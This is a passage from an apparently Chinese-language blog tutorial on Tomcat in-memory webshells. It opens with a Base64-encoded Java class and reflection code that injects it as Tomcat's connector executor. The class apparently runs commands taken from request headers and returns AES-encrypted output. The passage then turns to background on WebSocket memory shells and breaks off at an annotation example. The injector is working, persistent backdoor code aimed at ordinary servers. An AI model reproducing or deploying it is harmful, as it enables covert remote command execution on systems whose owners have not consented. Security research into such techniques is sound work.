                        byte[] classBytes = Base64.getDecoder().decode("yv66vgAAADQB+QoBFwEYCAEZBwEaCgEbARwKAR0BHgoAgQEfCQEgASEKAAMBIgoBIwEkCgB4ASUKASYBJwoBJgEoBwEpCADZCgAvASoHAMMKASYBKwgBLAoAAwEtCAC7CgAvAS4HAS8KATABMQgBMggBMwgBNAcBNQoAGwE2CwE3ATgLATcBOQgBOggBOwcAswgBPAcBPgoAIwE/CgEwAUAIAUEKAAMBQggBQwoAAwFECgEjAUUIAUYKAAMBRwoAAwFICgADAUkHAUoIAUsKAC8BTAoBMAFNCgAjAU4HAU8KASMBUAoAAwFRCAFSCAFTCAFUCAChCAFVCAFWBwFXCgA9ATYHAVgIAVkIANQHAVoIAVsKAC8BXAoAQgFdCgAvAV4HAV8HAWAKAEgBYQcBYgoBYwFkCgFjAWUKAWYBZwcBaAoATgFpBwFqCgBQAWsIAWwKAFABbQcBbgoAVAFRCgBUAW8KAFQBcAkBcQFyCgADAXMKAC8BdAcBdQoAWwF2CQF3AXgKAC8BeQoAYAF6BwF7CgF8AX0KAX4BfwoBfgGACgF8AYEHAYIKAAMBgwgAfAoAZQFCCAGECgBrAYUHAYYHAYcJAC8BiAoAbAEiCgBrAYkJAC8BigoAhgGLCgBrAYwKAAMBjQoANAF2CQAvAY4KAIEBjwoBFwGQBwGRAQASREVGQVVMVF9TRUNSRVRfS0VZAQASTGphdmEvbGFuZy9TdHJpbmc7AQANQ29uc3RhbnRWYWx1ZQEAA0FFUwEABktFWV9WSQEAAltCAQAQQ0lQSEVSX0FMR09SSVRITQEADWJhc2U2NEVuY29kZXIHAZIBAAdFbmNvZGVyAQAMSW5uZXJDbGFzc2VzAQAaTGphdmEvdXRpbC9CYXNlNjQkRW5jb2RlcjsBAA1iYXNlNjREZWNvZGVyBwGTAQAHRGVjb2RlcgEAGkxqYXZhL3V0aWwvQmFzZTY0JERlY29kZXI7AQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAZzdHJpbmcBAApFeGNlcHRpb25zAQAGPGluaXQ+AQCcKElJSkxqYXZhL3V0aWwvY29uY3VycmVudC9UaW1lVW5pdDtMamF2YS91dGlsL2NvbmN1cnJlbnQvQmxvY2tpbmdRdWV1ZTtMamF2YS91dGlsL2NvbmN1cnJlbnQvVGhyZWFkRmFjdG9yeTtMamF2YS91dGlsL2NvbmN1cnJlbnQvUmVqZWN0ZWRFeGVjdXRpb25IYW5kbGVyOylWAQAEdGhpcwEANExvcmcvZXhhbXBsZS90b21jYXRtZW1zaGVsbC9FeGVjdXRvci9UaHJlYWRFeGVjdXRvcjsBAAxjb3JlUG9vbFNpemUBAAFJAQAPbWF4aW11bVBvb2xTaXplAQANa2VlcEFsaXZlVGltZQEAAUoBAAR1bml0AQAfTGphdmEvdXRpbC9jb25jdXJyZW50L1RpbWVVbml0OwEACXdvcmtRdWV1ZQEAJExqYXZhL3V0aWwvY29uY3VycmVudC9CbG9ja2luZ1F1ZXVlOwEADXRocmVhZEZhY3RvcnkBACRMamF2YS91dGlsL2NvbmN1cnJlbnQvVGhyZWFkRmFjdG9yeTsBAAdoYW5kbGVyAQAvTGphdmEvdXRpbC9jb25jdXJyZW50L1JlamVjdGVkRXhlY3V0aW9uSGFuZGxlcjsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQA6TGphdmEvdXRpbC9jb25jdXJyZW50L0Jsb2NraW5nUXVldWU8TGphdmEvbGFuZy9SdW5uYWJsZTs+OwEACVNpZ25hdHVyZQEAsihJSUpMamF2YS91dGlsL2NvbmN1cnJlbnQvVGltZVVuaXQ7TGphdmEvdXRpbC9jb25jdXJyZW50L0Jsb2NraW5nUXVldWU8TGphdmEvbGFuZy9SdW5uYWJsZTs+O0xqYXZhL3V0aWwvY29uY3VycmVudC9UaHJlYWRGYWN0b3J5O0xqYXZhL3V0aWwvY29uY3VycmVudC9SZWplY3RlZEV4ZWN1dGlvbkhhbmRsZXI7KVYBAAtnZXRSZXF1ZXN0MgEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQABYgEAAWEBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQAQbmlvU29ja2V0V3JhcHBlcgEAEE5pb1NvY2tldFdyYXBwZXIBADlMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9uZXQvTmlvRW5kcG9pbnQkTmlvU29ja2V0V3JhcHBlcjsBAAN0bXABABJMamF2YS9sYW5nL09iamVjdDsBAA1zZWxlY3Rpb25LZXlzAQAhW0xqYXZhL25pby9jaGFubmVscy9TZWxlY3Rpb25LZXk7AQADb2JqAQAKbGlua2VkTGlzdAEAFkxqYXZhL3V0aWwvTGlua2VkTGlzdDsBAAV2YXIxMQEABWJ5dGVzAQADYnVmAQAVTGphdmEvbmlvL0J5dGVCdWZmZXI7AQAGdGFyZ2V0AQAKdGhyZWFkTmFtZQEABnRocmVhZAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAClRhc2tUaHJlYWQBAAt0aHJlYWRHcm91cAEAF0xqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIdGhyZWFkczEBABNbTGphdmEvbGFuZy9UaHJlYWQ7AQANU3RhY2tNYXBUYWJsZQcBSgcBlAcBKQcBGgcBewcAfgcBlQcBNQcBlgcBPgcBTwEAC2dldFJlc3BvbnNlAQAFKFtCKVYBAAdyZXF1ZXN0AQAfTG9yZy9hcGFjaGUvY295b3RlL1JlcXVlc3RJbmZvOwEACHJlc3BvbnNlAQAoTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1Jlc3BvbnNlOwEACnRtcF9vYmplY3QBAAdvYmplY3RzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAHdGhyZWFkcwEAA3JlcwcBVwEAB2V4ZWN1dGUBABcoTGphdmEvbGFuZy9SdW5uYWJsZTspVgEAIExqYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb247AQAiTGphdmEvbGFuZy9JbGxlZ2FsQWNjZXNzRXhjZXB0aW9uOwEAAnJ0AQATTGphdmEvbGFuZy9SdW50aW1lOwEAB3Byb2Nlc3MBABNMamF2YS9sYW5nL1Byb2Nlc3M7AQACaW4BABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAAxyZXN1bHRSZWFkZXIBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAhzdGRJbnB1dAEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAAXMBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAdjb21tYW5kAQAUTGphdmEvbGFuZy9SdW5uYWJsZTsBAANjbWQHAS8HAV8HAWIHAZcHAZgHAZkHAWgHAWoHAXUBAAhnZXRGaWVsZAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7AQANZGVjbGFyZWRGaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAAZvYmplY3QBAAlmaWVsZE5hbWUBAAVjbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7BwGaBwGbAQAGZGVjb2RlAQA4KExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAlzZWNyZXRLZXkBABhMamF2YXgvY3J5cHRvL1NlY3JldEtleTsBAAZjaXBoZXIBABVMamF2YXgvY3J5cHRvL0NpcGhlcjsBAAtieXRlQ29udGVudAEACmJ5dGVEZWNvZGUBAANrZXkBAAdjb250ZW50AQAGZW5jb2RlAQAKYnl0ZUVuY29kZQEAB2J5dGVBRVMBAA1nZXRDbGFzc0ZpZWxkAQBJKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvT2JqZWN0OwEABWZpZWxkAQADdmFyAQAIPGNsaW5pdD4BAAMoKVYBAApTb3VyY2VGaWxlAQATVGhyZWFkRXhlY3V0b3IuamF2YQcBnAwBnQGeAQBHdGFyZ2V0L2NsYXNzZXMvb3JnL2V4YW1wbGUvdG9tY2F0bWVtc2hlbGwvRXhlY3V0b3IvVGhyZWFkRXhlY3V0b3IuY2xhc3MBABBqYXZhL2xhbmcvU3RyaW5nBwGfDAGgAaEHAaIMAaMBpAwBDAGlBwGmDAGnAagMAJIA0QcBqQwBqgGrDACSAJMHAZQMAawBrQwBrgGvAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwDAEPARAMAbAAqAEABkNsaWVudAwBsQGyDAD4APkBABJqYXZhL2xhbmcvUnVubmFibGUHAZUMAbMBtAEACHNlbGVjdG9yAQANa3F1ZXVlV3JhcHBlcgEACnVwZGF0ZUxpc3QBABRqYXZhL3V0aWwvTGlua2VkTGlzdAwBtQG2BwGWDAG3AbgMAbkBugEAB2NoYW5uZWwBAARrZXlzAQAKYXR0YWNobWVudAcBuwEAN29yZy9hcGFjaGUvdG9tY2F0L3V0aWwvbmV0L05pb0VuZHBvaW50JE5pb1NvY2tldFdyYXBwZXIMAbwBvQwBvgG/AQAFVVRGLTgMAJIBwAEABWJsdWUwDAHBAcIMAaoBwwEAAQ0MAcEBxAwBxQHGDAHHAcgBADJvcmcvZXhhbXBsZS90b21jYXRtZW1zaGVsbC9FeGVjdXRvci9UaHJlYWRFeGVjdXRvcgEAEGJsdWVibHVlYmx1ZWJsdWUMAQIBAwwByQHKDAHLAcwBABNqYXZhL2xhbmcvRXhjZXB0aW9uDAGqAc0MAJIBFAEABGV4ZWMBAAhBY2NlcHRvcgEABnRoaXMkMAEABmdsb2JhbAEACnByb2Nlc3NvcnMBABNqYXZhL3V0aWwvQXJyYXlMaXN0AQAdb3JnL2FwYWNoZS9jb3lvdGUvUmVxdWVzdEluZm8BAANyZXEBACZvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZQEADFNlcnZlci10b2tlbgwBDAEDDAHOAc8MAKcAqAEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgEAGmphdmEvbGFuZy9SdW50aW1lRXhjZXB0aW9uDACSAdABACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgcBlwwB0QHSDAFSAdMHAZgMAdQB1QEAGWphdmEvaW8vSW5wdXRTdHJlYW1SZWFkZXIMAJIB1gEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIMAJIB1wEAAAwB2ACoAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMAdkB2gwB2wCoBwHcDAHdAd4MAd8B4AwA0ADRAQATamF2YS9pby9JT0V4Y2VwdGlvbgwB4QEUBwHiDAHjAJwMANwB5AwB5QHmAQAQamF2YS9sYW5nL09iamVjdAcBmgwB5wHoBwHpDAHqAesMAaAB7AwB7QHmAQAfamF2YXgvY3J5cHRvL3NwZWMvU2VjcmV0S2V5U3BlYwwB3wG/AQAUQUVTL0NCQy9QS0NTNVBhZGRpbmcMAe4B7wEAE2phdmF4L2NyeXB0by9DaXBoZXIBACFqYXZheC9jcnlwdG8vc3BlYy9JdlBhcmFtZXRlclNwZWMMAH0AfgwB8AHxDACFAIgMAQIB8gwB8wGlDACSAfQMAIAAhAwB9QH2DAH3AfgBADFvcmcvYXBhY2hlL3RvbWNhdC91dGlsL3RocmVhZHMvVGhyZWFkUG9vbEV4ZWN1dG9yAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyAQAYamF2YS91dGlsL0Jhc2U2NCREZWNvZGVyAQAQamF2YS9sYW5nL1RocmVhZAEAE2phdmEvbmlvL0J5dGVCdWZmZXIBABJqYXZhL3V0aWwvSXRlcmF0b3IBABFqYXZhL2xhbmcvUnVudGltZQEAEWphdmEvbGFuZy9Qcm9jZXNzAQATamF2YS9pby9JbnB1dFN0cmVhbQEAD2phdmEvbGFuZy9DbGFzcwEAJmphdmEvbGFuZy9SZWZsZWN0aXZlT3BlcmF0aW9uRXhjZXB0aW9uAQAQamF2YS91dGlsL0Jhc2U2NAEACmdldEVuY29kZXIBABwoKUxqYXZhL3V0aWwvQmFzZTY0JEVuY29kZXI7AQATamF2YS9uaW8vZmlsZS9QYXRocwEAA2dldAEAOyhMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL25pby9maWxlL1BhdGg7AQATamF2YS9uaW8vZmlsZS9GaWxlcwEADHJlYWRBbGxCeXRlcwEAGChMamF2YS9uaW8vZmlsZS9QYXRoOylbQgEABihbQilbQgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEADmdldFRocmVhZEdyb3VwAQAZKClMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAB2dldE5hbWUBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEABHdyYXABABkoW0IpTGphdmEvbmlvL0J5dGVCdWZmZXI7AQAIaXRlcmF0b3IBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEAJm9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvbmV0L05pb0VuZHBvaW50AQAEcmVhZAEAGShaTGphdmEvbmlvL0J5dGVCdWZmZXI7KUkBAAVhcnJheQEABCgpW0IBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEAB2luZGV4T2YBABUoTGphdmEvbGFuZy9TdHJpbmc7KUkBAAQoSSlWAQAWKExqYXZhL2xhbmcvU3RyaW5nO0kpSQEABmxlbmd0aAEAAygpSQEACXN1YnN0cmluZwEAFihJSSlMamF2YS9sYW5nL1N0cmluZzsBAAhwb3NpdGlvbgEAFChJKUxqYXZhL25pby9CdWZmZXI7AQAGdW5SZWFkAQAYKExqYXZhL25pby9CeXRlQnVmZmVyOylWAQAVKExqYXZhL2xhbmcvT2JqZWN0OylWAQAJYWRkSGVhZGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvU3RyaW5nOylWAQAYKExqYXZhL2xhbmcvVGhyb3dhYmxlOylWAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAIcmVhZExpbmUBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwEAIWphdmEvbmlvL2NoYXJzZXQvU3RhbmRhcmRDaGFyc2V0cwEABVVURl84AQAaTGphdmEvbmlvL2NoYXJzZXQvQ2hhcnNldDsBAAhnZXRCeXRlcwEAHihMamF2YS9uaW8vY2hhcnNldC9DaGFyc2V0OylbQgEAD3ByaW50U3RhY2tUcmFjZQEAHWphdmEvdXRpbC9jb25jdXJyZW50L1RpbWVVbml0AQAMTUlMTElTRUNPTkRTAQA3KExqYXZhL2xhbmcvUnVubmFibGU7SkxqYXZhL3V0aWwv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");
//                        ClassLoader classLoader = ClassLoader.getSystemClassLoader();//不能使用,找不到Tomcat下的类,如java.lang.NoClassDefFoundError: org/apache/tomcat/util/threads/ThreadPoolExecutor
                        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
                        Method defineClass = ClassLoader.class.getDeclaredMethod(
                                "defineClass", String.class, byte[].class, int.class, int.class
                        );
                        defineClass.setAccessible(true);
                        Class<?> ThreadExecutorClass = (Class<?>) defineClass.invoke(classLoader,
                                "org.example.tomcatmemshell.Executor.ThreadExecutor" , classBytes, 0, classBytes.length
                        );
                        ThreadPoolExecutor threadPoolExecutor = (ThreadPoolExecutor) getClassField(Class.forName("org.apache.tomcat.util.net.AbstractEndpoint"),this0, "executor");
                        Object instance = ThreadExecutorClass.getDeclaredConstructor(int.class,int.class,long.class,TimeUnit.class,BlockingQueue.class,ThreadFactory.class,RejectedExecutionHandler.class).newInstance(threadPoolExecutor.getCorePoolSize(), threadPoolExecutor.getMaximumPoolSize(), threadPoolExecutor.getKeepAliveTime(TimeUnit.MILLISECONDS), TimeUnit.MILLISECONDS, threadPoolExecutor.getQueue(), threadPoolExecutor.getThreadFactory(), threadPoolExecutor.getRejectedExecutionHandler());

                        this0.setExecutor((Executor) instance);
                        System.out.println("Inject done!");
                    }catch (Exception ignore){
                        ignore.printStackTrace();
                    }
                    break;
                }
            }
        } catch (NoSuchFieldException ex) {
            throw new RuntimeException(ex);
        } catch (ClassNotFoundException ex) {
            throw new RuntimeException(ex);
        } catch (IllegalAccessException ex) {
            throw new RuntimeException(ex);
        }
    }


    public static Object getClassField(Class clazz,Object object, String fieldName) throws NoSuchFieldException, IllegalAccessException {
        Field field = clazz.getDeclaredField(fieldName);
        field.setAccessible(true);
        Object var =  field.get(object);
        return var;
    }

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
}

所以我放弃这个马,我认为这个马有很多的局限性,当然作者思路还是很NB的,绝大部分问题在于我的技术不足

WebSocket内存马

Tomcat从7.0.2版本开始支持WebSocket。Tomcat 从 7.0.47 版本开始支持 JSR 356,废弃了之前的自定义 WebSocket API。引入了全新的API,包括:

  • 注解驱动的 WebSocket(@ServerEndpoint)

  • 标准的 Session、MessageHandler、Endpoint 等类接口

  • 与 Servlet 容器集成

tomcat-catalina 是 Tomcat 的核心模块之一,但 它并不包含 WebSocket 支持本身。要启用 WebSocket 功能,还需要额外添加 WebSocket 相关模块

<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-websocket</artifactId>
    <version>8.5.56</version>
</dependency>

Spring Boot 2.0 及以上版本,就已经 内置支持 WebSocket(JSR-356 标准)

WebSocket 是 全双工 的,客户端和服务器可以同时发送消息。

通信双方 都是 Endpoint,只是角色不同:

  • 客户端:ClientEndpoint

  • 服务端:ServerEndpoint

要注入WebSocket内存马,先看看建立一个WebSocket通道具体怎么实现的,可分为注解实现和手动实现两种

注解实现

服务端

利用@ServerEndpoint注解创建WebSocket。服务端在接收到握手请求后,为每个连接自动创建一个新的 ServerEndpoint 实例。

如下:

import javax.websocket.OnClose;
import javax.websocket.OnError;
